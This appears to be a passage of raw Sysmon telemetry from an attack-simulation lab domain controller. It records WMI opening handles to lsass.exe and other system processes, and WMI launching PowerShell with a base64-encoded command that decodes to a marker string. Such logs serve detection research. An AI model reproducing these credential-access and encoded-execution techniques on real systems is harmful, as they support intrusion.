16:54:42.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242085Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242084Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242083Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242082Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242081Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242080Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242079Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242078Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242077Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242076Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.475{05ADC7E1-6DD2-603E-CAAA-00000000AD01}12336ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_u1xe3crd.gre.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002242075Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.475{05ADC7E1-6DD2-603E-CAAA-00000000AD01}12336ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_u5pzx3x2.d22.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002242074Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.475{05ADC7E1-6DD2-603E-C6AA-00000000AD01}4828ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242073Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.475{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-CDAA-00000000AD01}12876C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242072Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.475{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-CCAA-00000000AD01}14264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242071Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.475{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242070Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.475{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242069Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.475{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242068Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.475{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242067Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.475{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-CCAA-00000000AD01}14264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242066Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CCAA-00000000AD01}14264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002242065Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.480{05ADC7E1-6DD2-603E-CCAA-00000000AD01}14264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /Enc VwByAGkAdABlAC0ASABvAHMAdAAgADAAOQA2ADQAOQBlADMANAAtAGYAZgA2AGUALQA0ADQAOAA2AC0AOQBlADMANwAtAGUAYQA1ADMAMwA2ADQANQAwADEANgAyAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002242064Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.475{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-C8AA-00000000AD01}12460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242063Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.475{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-C8AA-00000000AD01}12460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000002242062Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.473{05ADC7E1-6DD2-603E-CAAA-00000000AD01}12336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_u5pzx3x2.d22.ps12021-03-02 16:54:42.473 10341000x80000000000000002242061Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CBAA-00000000AD01}10480C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242060Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CAAA-00000000AD01}12336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windo